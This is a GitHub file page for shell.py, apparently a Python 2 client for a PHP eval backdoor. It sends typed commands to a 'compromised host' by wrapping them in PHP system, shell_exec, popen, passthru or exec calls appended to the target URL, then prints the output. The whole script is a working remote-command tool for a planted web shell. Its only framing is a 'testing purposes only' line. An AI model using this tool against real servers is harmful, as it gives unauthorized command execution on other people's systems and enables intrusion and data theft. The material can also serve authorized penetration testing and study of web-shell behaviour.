forked from infodox/php-eval-shell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshell.py
executable file
·88 lines (84 loc) · 2.55 KB
/
shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/python
# shell.py
# uses the "test.py" shell.php to give a basic "shell" on target.
# I advise uploading a better shell ASAP
# infodox | insecurety.net
import sys
import requests
print """
Test Shell.
This "shell" is for testing out different execution functions
on a remote host. The idea is, once you identified a working
system execution function using test.py, you can then use this
to act as a "remote shell" or "terminal emulator" for interacting
with the compromised host.
This is for testing purposes only. Seriously.
- infodox | insecurety.net
"""
if len(sys.argv) != 2:
print "Usage: ./shell.py <targeturl>"
print "Example: ./shell.py http://localhost/test.php?eval="
sys.exit(0)
url = sys.argv[1]
print "Select execution type to use\n"
print "1. system() function"
print "2. shell_exec() function"
print "3. popen() function"
print "4. passthru() function"
print "5. exec() function"
func = raw_input("Function to use: ")
if func == "1":
print "[+] Using system"
while True:
command = raw_input("shell:~$ ")
if command == "exit":
sys.exit(0)
else:
evilphp = "system('" + command + "');"
requri = url + evilphp
r = requests.get(requri)
print r.text
elif func == "2":
print "[+] Using shell_exec"
while True:
command = raw_input("shell:~$ ")
if command == "exit":
sys.exit(0)
else:
evilphp = "echo shell_exec('" + command + "');"
requri = url + evilphp
r = requests.get(requri)
print r.text
elif func == "3":
print "[+] Using popen"
while True:
command = raw_input("shell:~$ ")
if command == "exit":
sys.exit(0)
else:
evilphp = "popen('" + command + "');"
requri = url + evilphp
r = requests.get(requri)
print r.text
elif func == "4":
print "[+] Using passthru"
while True:
command = raw_input("shell:~$ ")
if command == "exit":
sys.exit(0)
else:
evilphp = "passthru('" + command + "');"
requri = url + evilphp
r = requests.get(requri)
print r.text
elif func == "5":
print "[+] Using exec"
while True:
command = raw_input("shell:~$ ")
if command == "exit":
sys.exit(0)
else:
evilphp = "echo exec('" + command + "');"
requri = url + evilphp
r = requests.get(requri)
print r.text